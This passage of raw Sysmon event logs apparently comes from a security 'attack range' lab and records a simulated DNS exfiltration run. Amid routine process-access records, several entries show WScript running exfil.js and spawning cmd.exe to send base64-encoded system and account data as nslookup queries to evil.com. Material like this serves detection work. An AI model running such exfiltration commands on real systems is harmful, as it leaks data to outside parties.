SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-A944-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-18F2-629A-A744-000000005F02}70602820C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-A944-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.006{2E1864BB-18F3-629A-A944-000000005F02}7416C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-A744-000000005F02}7060C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaomv.tmp 2>&1 23542300x800000000000000044809Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:39.939{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=675403A1630C5CFCB4AD2E628664BA76,SHA256=012C23E5EC916481955998AD60A90BE91E3CE1897B2970C722DBE9016EF75F56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.989{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-EA44-000000005F02}6404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.989{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-EA44-000000005F02}6404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.964{2E1864BB-18F4-629A-EA44-000000005F02}64047432C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E944-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-EA44-000000005F02}6404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E944-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-18E0-629A-6742-000000005F02}39764204C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-E944-000000005F02}7752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.952{2E1864BB-18F4-629A-E944-000000005F02}7752C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlokubp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.948{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzfw.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000212090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.376{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50966- 354300x8000000000000000212089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.375{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50965- 354300x8000000000000000212088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.375{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50964- 10341000x8000000000000000212087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-18F4-629A-E744-000000005F02}53927512C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E844-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E844-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-18F4-629A-E644-000000005F02}37321292C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-E844-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.917{2E1864BB-18F4-629A-E844-000000005F02}5592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F4-629A-E644-000000005F02}3732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxzfw.tmp 2>&1 10341000x8000000000000000212079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.901{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E744-000000005F02}5392C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.901{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F4-629A-E744-000000005F02}5392C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.885{2E1864BB-18F4-629A-E744-000000005F02}53927512C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-E644-000000005F02}3732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.885{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-E744-000000005F02}5392C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.884{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 